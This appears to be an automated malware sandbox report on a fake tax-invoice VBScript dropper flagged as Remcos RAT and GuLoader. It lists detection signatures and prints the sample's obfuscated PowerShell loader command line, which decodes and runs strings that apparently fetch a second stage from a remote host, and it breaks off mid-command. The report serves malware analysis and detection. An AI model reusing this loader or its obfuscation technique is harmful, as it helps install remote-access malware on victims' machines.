Edit tour
Windows
Analysis Report
NTS_eTaxInvoice.html.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1264 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\NTS_e TaxInvoice .html.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1788 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Permit Billeted L ivserfaren t Magmatis m #>;$Homo logue='ens orrow';<#p rossie Udr yddelsesle jrenes Int erjectiona lized joba nnoncer An stillelser Sdmefulde s Bakkeen #>;$Sledge hammered=$ host.Priva teData;If ($Sledgeha mmered) {$ Genanvende lser++;}fu nction Dem issioner($ Unlaconic) {$Conversa tions=$Une ngaging+$U nlaconic.L ength-$Gen anvendelse r;for( $Ka naljen=5;$ Kanaljen - lt $Conver sations;$K analjen+=6 ){$Cochleo us+=$Unlac onic[$Kana ljen];}$Co chleous;}f unction Co mplimentab le($centro nucleus){ . ($Garan ti) ($cent ronucleus) ;}$Convect ively=Demi ssioner 'A dherMPinoc o.ivinzDes iligene lR ed,vlR.rri a Limo/Mic .o5Efter.E oti0.itdo Phram(Odi niWPrvebiS yndin Breb dHid eo Ad vewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super ;Pr,va Ase p WIndk,iH alvpn enat 6Still4Ana bl; Peri B laanxOppeb 6Smukt4Cou nt;Filtr C uretrBasi vBedoe:Dry pf1Flo e2M ando1Soran .Tipol0bag gr)Spotm a ngstGPho.o ekongec.ei gekN,wfooR all/Tria 2Svmme0Sge ko1Telem0D ool0 Babe 1rdk k0Mar ki1Recir B .jekFKalen iTrl grhyp opeRehabfS kimtoOpht. x ffec/Ch om1Rund,2 Scut1 Ytre .Ripen0Und lb ';$Sacc harofarina ceous=Demi ssioner ' PostUTek o SKanteESk ivRVan e-R iffiAMulti gWeeklEmel oNIdiorT Pr.t ';$De rmoid108=D emissioner 'TzolkhWy nketIndflt Ga.gpP.rs osForga:Se cti/abern/ FemdodHosp ir StariMo ilsvKakkee Chup.Dela fgDeflooRe dero,endrg MonolFugt ieArkiv.Me dvicA,eneo Ko,mumObsk n/ ailluHa rroc Ince? Mo emeErga sx LivspIn obto Pu rr valetDrue k= forsdFo rtroMatriw Con entill ylGnat,oAn greaSo mad gldsf&.usk eiParamdBa cil= Nive1 Pilloa ffi cJAnticrKa pil3FremmE PrimrNKor, oUH,perZPa .acI BoucK FeatuKSkyt sZnanziBTe ks mHaircN Svineb Afl gdFoame6Me nedi Mutao Sols.0 gtp barr sC ac co5DekupvS endesAlder IImmunIJaz zo6KommuaO ve.vL.aike 1Antit ';$ Henrykkels er=Demissi oner ' Und .>Ga.um '; $Garanti=D emissioner 'uns.dIBe spiEUne hX Ndend ';$F unktionens 98='Zizit' ;$Klemskru e67='\Fors varsundtag elsen.Non' ;Complimen table (Dem issioner ' S,udv$pott egNonmulSk ifeo kloeb PolitaTer, ilph.ll:Fo rbrTSubpra Euphok Vat ttAlterrKo mmueUdr ag acuuBrn p lPaahneDef inrStigmiH alssnD.lan gUn omsF r gro rrisrW ar,odSolba nNeglei Hj denAgramgT ilkr=Antik $Mutile Ud fln FendvN onfa:blatt a Frikp Kl asp tetidG nat.aSkole tmonu aInd ja+ Srej$S ekssKColeg lBetake C vimBe.risP iruekInd u r BekmuBam bue erni6H emap7 Asp, ');Compli mentable ( Demissione r ' Prmi$Q ibbgStenk lFiletoI d esbChambaU nderl Spec : ardRnonm oeLycopk r hebr Prole Skov eHaze lr SatreIn dbodSnoree nyh dsTung s= Eco,$ H jemD Udlae Stro rColo gmIndsaoSa mpli Mimod ko,m1 loa t0Affat8Re for.Bedris E prpJ.gt rlDehemi e